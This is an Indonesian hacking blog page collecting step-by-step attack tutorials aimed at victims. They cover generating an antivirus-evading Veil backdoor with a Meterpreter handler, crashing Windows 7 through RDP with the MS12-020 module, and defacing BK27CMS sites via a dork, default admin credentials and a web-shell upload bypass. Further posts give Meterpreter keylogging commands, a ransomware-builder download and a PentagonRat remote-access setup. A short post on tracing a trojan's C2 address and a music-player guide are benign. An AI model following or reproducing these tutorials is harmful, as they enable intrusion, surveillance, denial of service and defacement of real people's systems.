Termux ID: By Maxter -->

    Social Items

Home / By Maxter

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

 


Hello everyone, nah sesuai janji gw kemarin, gw bakalan share bagaimana Cara Membuat Backdoor FUD Menggunakan Veil-evasion. Oke veil-evasion yg kita gunain yaitu veil versi 2.28.2, kalian tinggal menyesuaikan saja :) , tanpa basa basi, kita langsung saja bahas tutorialnya.

Baca juga :

Jika belum mempunyai veil-evasion, kita bisa langsung install lewat terminal dengan perintah :
apt-get install veil-evasion

Oke kalo sudah terinstall, tinggal run saja veil evasionnya,

1.  untuk melihat jenis-jenis payload yg tersedia, kita ketikkan perintah berikut
list

2. setelah itu akan muncul beberapa jenis list payload yg bisa kita gunakan, pada versi veil kita, ada 51 jenis payload yg bisa kita buat, disini kita menggunakan payload yg bernomor 49, lalu kita ketik perintah :
use 49

karena payload yg kita gunakan bernomor 49.

3. Setelah itu kita set LHOST dan LPORT kita seperti biasanya.
kita set Lhost dulu dengan perintah :
set LHOST 192.x.x.x

LHOST tersebut silahkan sesuaikan dengan ip kalian, mau lokal, atau publik, terserah,

4. Lalu jika ingin mengatur port, kalian juga bisa atur sesuka hati, tp karna tutor berikut untuk lokal, saya membiarkan port tersebut default, yaitu 4444

5. Untuk melihat detail info yg telah kita atur, kalian bisa mengetikkan perintah :
info

disana akan muncul deskripsi payload yg akan kita generate

6. Jika sudah sesuai keinginan, tinggal kita generate saja payloadnya dengan perintah
generate

7. Setelah itu kita akan disuruh memberi nama payload kita, yha kalian isi saja sesuai keinginan dan kebutuhan kalian ^_^

8. jika generate sudah selesai, lokasi payload yg telah kita buat lokasinya ada di : /usr/share/veil-output/compiled/namapayloadkalian.exe

9. Handler file kita berlokasi di : /usr/share/veil-output/namapayload_handler.rc
 (silahkan copy saja lokasi itu seperti gambar berikut


10. Lalu buat tab baru untuk tab msfconsolenya dan ketikkan perintah :
msfconsole -r /usr/share/veil-output/handler/namapayloadkalian_handler.rc

ket : setelah dir "handler", tinggal pastekan kan saja yg telah kita copy sebelumnya :)

11. Setelah itu tinggal copy kan saja Payload/backdoor yg telah kita buat pada korban kita :) lalu Run payload kita, dan sesi meterpreter pun akan terbuka ^^

12. Setelah terbuka, terserah kalian mau kalian apakan :'v, jika kurang jelas, berikut video tutorialnya

berikut linknya : https://www.youtube.com/watch?v=LF9Zi_jg7uA

Sekian saja Tutorial dari Maxteroit, mohon maaf jika ada kekurangan, jika ada yg masih tidak jelas silahkan tanyakan di kolom komentar, terima kasih :)

Cara Membuat Backdoor FUD Menggunakan Veil-evasion

BSOD Attack Pada Windows Dengan Metasploit


BSOD Attack

BSOD (Bluescreen of death), kalian pasti pada tahu apa itu bluescreen, bluescreen biasanya terjadi karna adanya gangguan pada sistem operasi atau harddisk yg kita pakai, namun Bluescreen yg akan kita bahas ini terjadi karena serangan DOS menggunakan tool METASPLOIT, berikut tutorialnya :

Syarat :
- korban menggunakan windows 7
- satu jaringan
- korban sudah mengaktifkan "allow remote desktop".

BACA JUGA :
Cara menemukan celah disuatu website 
Perintah Meterpreter Metasploit 


1. Buka metasploit console anda
2. lalu ketikkan :
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. Target saya memiliki ip 192.168.43.93 , silahkan sobat sesuaikan dengan ip target sobat, lalu ketik seperti berikut :
set RHOST 192.168.43.93

4. Nah setelah memasukan IP target, tinggal kita exploit, dengan mengetikkan perintah :
exploit

5. Jika berhasil, akan ditunjukkan dengan peringatan :
[+] 192.168.43.93:3389 - 192.168.43.93:3389 seems down
6. Windows pun akan bluescreen, ada juga yg langsung mati lalu melakukan restart secara paksa.

Bila kurang jelas, berikut ada videonya :


BSOD Attack Pada Windows Dengan Metasploit

Tutorial Deface bk27cms bypass administrator


Hell come back to maxteroit boy, sorry baru update lagi, dan kali ini saya akan membahas tentang Tutorial Deface bk27cms bypass administrator, dan tutorial ini saya dapatkan dari teman se-team saya yg bernickname k4luga, alias mas adhi :* , oke langsung saja kita bahas tutorialnya.

Dork sementara :
intext:Powered by BK27CMS

selebihnya kembangin sendiri yha :)

Pertama, kita dorking dulu menggunakan dork diatas :


setelah itu, kita pilih salah satu calon korbannya, jika sudah memilih, tambahkan /bk27panel setelah domain utama, misal >>> target.com/bk27panel

Kedua, Setelah masuk ke web loginnya, masukkan :
username : webmaster

dan password : 303305


Ketiga, setelah berhasil login, masuk ke tab Komponen


Keempat, tugas kita disini yaitu uploading shell, untuk itu, pilihlah menu Files Upload seperti gambar berikut


Kelima, nanti disana tersedia uploader files, nah disini sebaiknya kita bypass ekstensi shellnya dengan ekstensi .php.pjpeg >>> shell.php.pjpeg, lalu klik browse, trus carilah shell kalian untuk diupload.


Keenam, jika sudah terupload, akan tercantum nama file yg sudah kita upload tadi, lalu klik kanan lah mouse kalian lalu copy link location shell kalian, seperti berikut



Jika shell sudah terakses, terserah kalian mau kalian apaain :v , kami tidak bertanggung jawab :v,
sekianlah tutorial sederhana dari maxteroit, jika ada yg tidak jelas, silahkan tanyakan di komentar,
terima kasih

thx to :
k4luga a.k.a mas adhi (Owl Squad)

Tutorial Deface bk27cms bypass administrator

Perintah atau Command Meterpreter Session Metasploit

Metasploit

Perintah atau Command Meterpreter Session Metasploit,
Metasploit.. metasploit bagi saya adalah tool yg paling canggih yg pernah saya temui, mengapa ? karena tool metasploit ini memiliki berbagai jenis exploit, modul, dan pastinya pengexploitasiannya yg multiplatform.

Salah satu yg sering dipakai pada tahun2 sekarang adalah pengexploitan terhadap windows dan juga android dengan menggunakan msfvenom, jika dalam istilah hacking, jenis serangan ini dinamakan REMOTE ATTACK.

Tutor Remote Attack :
Hack Windows beda jaringan dengan Metasploit
Hack Windows Mengganakan Pentagon 

Berbicara soal metasploit, tidak lepas dari yg namanya Meterpreter , yha session meterpreterlah yg paling diinginkan oleh para user metasploit yg melakukan exploitasi dengan metasploit. Dan pada post ini saya akan membahas mengenai "Perintah atau Command Meterpreter Session Metasploit".

Meterpreter


Perintah Inti:

  • ? - Untuk menampilkan menu bantuan
  • background - Untuk keluar sementara dari sesi yg kita buka
  • bgkill - Untuk coly, artiin sendirilah, pasti ngerti :v, bg = background
  • bglist - Untuk menampilkan background list yg masih berjalan
  • bgrun - Artiin sendiri ea :v
  • exit - Keluar dari meterpreter
  • help - Sama seperti perintah "?"
  • run - lari :v , pasti taulah
  • dll masih ada beberapa lagi, males gw :| 

Perintah File Yang Ada Di System Korban(Windows)
  • cat - Sama seperti Linux, membaca dan menampilkan isi kontent suatu file
  • cd - Ini pasti pada tahu, untuk move ke directory lain
  • del - Delete sesuatu pastinya :)
  • download - Untuk mendownload sesuatu yg ada di storage korban
  • edit - Yha untuk mengedit, tp menggunakan editor vim 
  • getlwd - Menampilkan direktori lokal sistem
  • lcd - Ubah direktori local
  • ls - Menampilkan list file, folder di direktori yg telah kita masuki
  • mkdir - Alias makedir, yaitu membuat sebuah direktori/folder
  • rm - Yaitu remove atau mendelete sesuatu
  • upload - Untuk upload sesuatu ke storage korban dari storage kita
  • Dll :v 
 Perintah Network
  • ipconfig - Yg ini wajib tahu lah
  • portfwd - Port forward pada sistem korban
  • route - Lihat atau modifikasi routing table korban
 Perintah System pada Korban
  • clearav - menghapus log siapa saja yg pernah login ke system korban
  • execute - perintah untuk mengeksekusi file diwindows melalu meterpreter
  • getpid - mengambil Proses ID pada windows (PID)
  • getprivs - mendapatkan hak akses apapun
  • getuid - mengambil info pengguna berjalan sebagai akses apa
  • kill - bunuh :v , pikirin lah
  • ps - melihat proses yg berjalan
  • reboot - reboot pc korban
  • reg - interaksi dengan registry korban
  • shell -istilahnya membuka cmd korban
  • shutdown - shuts down komputer korban
  • sysinfo - menampilkan info sistem device korban, misal OS
Perintah User Intefaces
  • enumdesktops - Menampilkan list desktop yg dapat diakses
  • getdesktop - Menyusup ke Desktop korban
  • idletime - Mengecek waktu Idle korban
  • keyscan_dump - Dump dari keylogger yg kita start
  • keyscan_start - Menjalankan keylogger pada korban
  • keyscan_stop - Menghentikan keylogger yg kita start
  • screenshot - Mengambil screenshot desktop korban
  • set_desktop - Mengganti desktop meterpreter
  • Dll

Mungkin segitu saja yg gw bahas, nanti kalian tinggal ketik salah satu perintah diatas, lalu tekan TAB, nanti akan muncul pilihan perintah lanjutannya :)
Thx

Perintah atau Command Meterpreter Session Metasploit

Ransomware [Trident File Locker] mini ransomware


Tersebarnya berita mengenai kemunculan ransomware jenis baru yaitu "Wannacry" memunculkan saya ide untuk membuat post ini yaitu Ransomware [Trident File Locker] mini ransomware, saya akan bahas sekilas apa itu ransomware.

Ransomware, jika kalian bisa bahasa inggris, maka kalian akan cepat menyimpulkan apa itu ransomware :) , jika tidak paham, pahami teks berikut ini ==> RANSOM = TEBUSAN (bhs indonesia)
==> WARE = bisa diartikan perangkat (mungkin software)
Dari teks diatas bisa sobat simpulkan apa itu ransomware :) atau masih bingung juga ? simpulkan juga dari gambar laptop diatas :).

Oke jika sudah paham apa itu ransomware, disini saya akan membagikan tool builder seperti ransomware atau bisa dibilang juga sebagai mini ransomware :). namanya adalah Trident File Locker, tool ini sangat sederhana tetapi cukup mengagumkan, karena disana tersedia banyak sekali jenis ekstensi yg bisa kita gunakan dan juga kita bisa menambahkan ekstensi baru, berikut gambarnya :


Baca Juga:
Bisa dilihat sendiri fitur2nya, ada password, penambah ekstensi dll.
jika penasaran, sobat bisa mendownloadnya langsung di link berikut

Cara pakainya ? coba2 saja sendiri agar lebih tahu.
  Sekian Terima kasih :)

Ransomware [Trident File Locker] mini ransomware

Cara Mengetahui Alamat IP Dari Sebuah Rat atau Trojan atau Backdoor




Cara Mengetahui Alamat IP Dari Sebuah Rat atau Trojan atau Backdoor.
Trojan atau Rat ditahun-tahun ini memang sedang ramai-ramainya jadi perbincangan. Banyak Programmer telah membuat tool untuk men-generate sebuah trojan dengan cepat dan instan, kita sebagai pengguna tool tersebut tidak perlu memikirkan code-codenya seperti apa, tetapi kita cukup mengatur icon, alamat listener kita, dan setting lainnya.

Dan tidak kebetulan, saya disini akan memberi tahu cara mengetahui alamat ip atau alamat network dari suatu trojan atau rat dengan mudah, langsung saja ke langkah-langkahnya :) , cekidot...

Baca Juga :

Tutorial Deface Metode Sql Injection
Deface Wordpress Themes Dreamwork 

Bahan-bahan :
- Sandboxie bisa didownload di link berikut ===> Sandboxie
- ApateDNS bisa didownload di link berikut ===> ApateDNS

Langkah-langkah :

1. untuk mempermudah, satukan tool-tool yg dibutuhkan dalam satu folder, baik sandboxie, apateDNS maupun trojan yg siap kita cari alamat networknya.

2. buka aplikasi ApateDNS nya lalu klik Start Server yg ada dipojok kanan aplikasi ApateDNS tersebut sehingga seperti berikut :


3. Lalu buka aplikasi Sandboxienya, setelah dibuka, drag trojan atau rat yg akan dicari alamatnya ke arah area sandboxie dan otomatis trojan akan berjalan seperti berikut :



4. Jika Trojan atau Rat telah berjalan, maka akan seperti gambar berikut


Lalu bukalah aplikasi ApateDNS nya, maka akan terlihat alamat sesungguhnya dari trojan tersebut, seperti gambar :


nah alamat pemilik dari trojan tersebut sudah terlihat jelas yaitu ada didalam kolom aplikasi ApateDNS, dan yg terlihat di gambar beraalamat : artefvcker.ddns.net

5. Untuk mengetahui IP dari DNS tadi yaitu kita cukup melakukan ping pada alamat tersebut menggunakan cmd, dan seperti berikut jadinya :


Dan sekarang kita sudah mengetahui DNS dan Ip dari pengguna trojan atau rat tersebut :D ,
Berikut Videonya jika kurang jelas
Untuk linknya disini ===> LINK VIDEO


Sekian saja tutorial dari saya, jika kurang jelas atau link mati, silahkan berkomentar dikolom yg telah disediakan :)
Terima kasih

Cara Mengetahui Alamat IP Dari Sebuah Rat atau Trojan atau Backdoor

Cara Memutar Musik Di Terminal Linux


Cara Memutar Musik Di Terminal Linux..
 
Everything On Terminal, yha mungkin itulah ungkapan yg sangat cocok bagi pengguna Gnu/Linux, lebih khususnya bagi yg tidak bisa lepas dari terminal.
Mengapa disebut demikian ? karena dengan Terminalnya linux, kita bisa melakukan berbagi macam hal atau kegiatan, misalkan untuk kegiatan Hacking, Cracking, Ngoding, dan bahkan Playing Music.

Dan kali ini, ane (Maxter) akan bahas mengenai Cara Memutar Musik Di Terminal Linux dengan Moc, kali2 menyimpang lah dari tutor yg biasa ane update yaitu seputar hacking :v.

Dan disini saya menggunakan OS Kali Linux tercinta, kurang lebih sama dengan distro2 lain yg masih menggunakan perintah "apt apt an :v". Langsung saja kita bahas :

Baca Juga : 


Pertama, pastikan Repositori sobat telah benar, alias tidak ada lagi unable to locate lagi.
Selanjutya buka terminal sobat lalu masukkan peritah berikut untuk mengistall Moc
apt-get install moc

Apps moc ini sizennya sangat kecil kok, jadi tunggu saja sebentar saat proses penginstalannya.

Jika proses Install sudah selesai, tinggal panggil saja apps MOC nya dengan perintah berikut
mocp

Maka Apps MOC pun akan muncul, lalu tinggal cari saja lokasi musik2 sobat


Setelah memilih tempat penyimpanan musiknya, Tinggal tekan Enter saja untuk memulai musiknya, untuk Pause, tinggal tekan Spasi saja.
Untuk Men-Stop musik, tekan saja S , dan untuk meminimize tekan saja Q .

Yha sekian saja tutorial dari maxteroit, kurang lebihnya mohon dimaafkan, Terima kasih.

Cara Memutar Musik Di Terminal Linux (Kali Linux-Ubuntu-Debian-Dll)

Tutorial Rat Windows Dengan PentagonRat




Tutorial Rat Windows Dengan PentagonRat
Assalamualaikum sobat maxteroit, sudah lama tidak post karena sibuk dengan kegiatan disekolah :D.
Kali ini saya akan posting mengenai Tutorial Rat Windows Dengan PentagonRat, karena banyak permintaan dari teman2 saya di fb.

Sebenarnya saya telah post mengenai rat ini dipostingan sebelumnya yaitu Hack Windows Beda Jaringan Dengan Metasploit , yha mau bagaimana lagi, tutor tersebut saya peruntukan bagi pengguna linux, khususnya kali linux, dan kali ini saya akan beri step cara Hack Windows beda jaringan Dengan Windows,

Baca juga :
Hack Windows Beda Jaringan Dengan Metasploit 
Keylogger Manjur Untuk Windows atau Linux

 Berikut bahan dan langkahnya :

Bahan :
Pentagon Rat, Download disini ===> Pentagon Rat

Langkah-langkah :

1. Matikan terlebih dahulu AntiVirus Windows kalian, karena Tools ini akan terdeteksi sebagai virus, yha memang hampir seluruh tools seperti ini akan terdeteksi sebagai virus.

2. Download Tools Pentagon Rat, ada di link atas tadi.

3. Daftar vpn di web ipjetable untuk mendapatkan vpn yg support port Forwarding, linknya ada disini ====> IpJetable.net

4. Buka web email generator untuk register yaitu di web temp-mail.org ===> https://temp-mail.org

5. Buka web Free-proxy.xyz untuk membuka link konfirmasi dari ipjetable ===> http://free-proxy.xyz

6. Buka juga web canyouseeme.org untuk meng-cek kepastian keberhasilan port foward ==> http://www.canyouseeme.org/

7. Register di web noip.com untuk mengganti ip publik anda diganti dengan dns. ==> http://www.noip.com/

Oke begini langkah register dan mendapatkan vpn di ipjetable :

1. masuk ke web https://temp-mail.org, lalu otomatis ente akan dapet email yg diberikan dari web itu. misal seperti gambar berikut



2. Copy kan nama email yg kalian dapat, misal alamat email saya seperti gambar diatas : jizejuca@evyush.com

3. Masuk ke web Ipjetable, lalu register lah dengan email yg didapat tadi, dan isi captcha sesuai dengan gambar, jika salah, ulangi lagi seperti berikut 

Dan jika sudah benar, akan muncul Tampilan seperti berikut :

4. Selanjutnya buka kembali web temp-email, disana akan ada pesan konfirmasi dari pihak ipjetable, jgn klik dulu linknya, tapi klik kanan link lalu copy link addressnya, setelah dicopy, buka web free-proxy.xyz lalu pastekan dikolom yg disediakan :

5. Selanjutnya tinggal klik Unblock, maka kita akan diarahkan ke link yg diunblock tersebut, disana kita disuruh login dengan username dan password yg telah kita dapat di email tadi, silahkan buka email kalian dan masukkan username dan password kalian.

 Setelah login, mari kita atur pengaturan di windows kita, yaitu seperti berikut

1 . Pertama-tama kita matikan dulu firewall kita, agar port forwarding kita berhasil, :
(DISINI SAYA MENGGUNAKAN WIN10, KURANG LEBIH SAMA DENGAN WIN LAINNYA)

- Klik kanan icon wifi atau network sobat yg berada di ujung kanan bawah, lalu pilih "Open Netword And Sharing Center" , kurang lebih seperti ini :
- Lalu klik yg saya tandai dibagian Windows Firewall, lalu pilih Turn Windows Firewall On or Off

- Lalu Turn Off kan semua firewall nya


Langkah selanjutnya adalah mengaktifkan vpn kita, yaitu dengan cara klik kanan icon wifi atau internet kita seperti tadi, lalu masuk ke menu seperti yg saya tandai digambar berikut

Lalu pilih "Connect to a Workplace"

Kemudian pilih "No, i'll create a new connection" kemudian pilih juga "Use my Internet connection", lalu isi bagian yg harus diisi menjadi seperti ini

ket : Internet address diisi : pptp.ipjetable.com
 Destination name bisa diisi bebas.

Jika berhasil, maka dibagian untuk konek internet, akan ada pilihan nama VPN yg telah kita buat tadi

Lalu klik saja Nama Vpn nya, nanti kita akan disuruh memasukkan username dan password yg telah kita dapat dari hasil register ipjetable tadi

Silahkan isi dengan Username dan password yg telah kalian dapat.
Setelah terhubung ke vpn.
Kita masuk ke setting Duc Noip nya, pertama masuk ke web noip.com dan lakukan register dan jika sudah register dan konfirmasi email, setelah itu silahkan Download aplikasi yg diperlukan yaitu Duc Noip, silahkan klik link seperti gambar berikut yg saya beri kotak merah
setelah itu, silahkan manage DNS anda sesuai keinginan, disini saya settingnya seperti berikut


Setelah mengatur nama DNS, silahkan buka aplikasi Duc yg didownload tadi, dan isi username dan password dari web noip tadi, bukan dari ipjetable. Jika berhasil, maka tampilan Duc nya seperti ini
Langkah selanjutnya yaitu membuka aplikasi Pentagon Rat nya, jika belum diinstall,silahkan diinstall terlebih dahulu.
Jika ada pengisian port, biarkan default saja dengan mengklik Start.
Jika sudah dibuka, kita atur masukkan dns kita di tab Builder Pentagon Rat nya, kurang lebih seperti ini dan isi dns sesuai yg telah disetting di noip kalian.

Setelah diatur, langsung saja ke menu Build, untuk men-generate RAT nya alias trojannya, sebelumnya kalian bisa atur iconnya juga, pokonya atur-atur aja sendiri :v.

yha kira-kira seperti itu cara generate Trojannya, dimana lokasinya dan berekstensi apa trojannya, dan digambar itu saya set .exe sebagai ekstensi ratnya.

berikut hasil percobaan saya, dalam beda jaringan yha, bukan lokal lagi :D


Jika sudah begitu, bebas deh mau diapain tuh korban, bisa diajak chat, acak-acak, shutdown, restart keylog dll :v

Sekian tutor dari saya, kurang lebihnya mohon maaf, jika ada yg kurang jelas, bisa langsung tanyakan di fanspage kami lewat chat atau di-wall fanspage kami, terima kasih.

Tutorial Rat Windows Dengan PentagonRat

Subscribe to: Posts (Atom)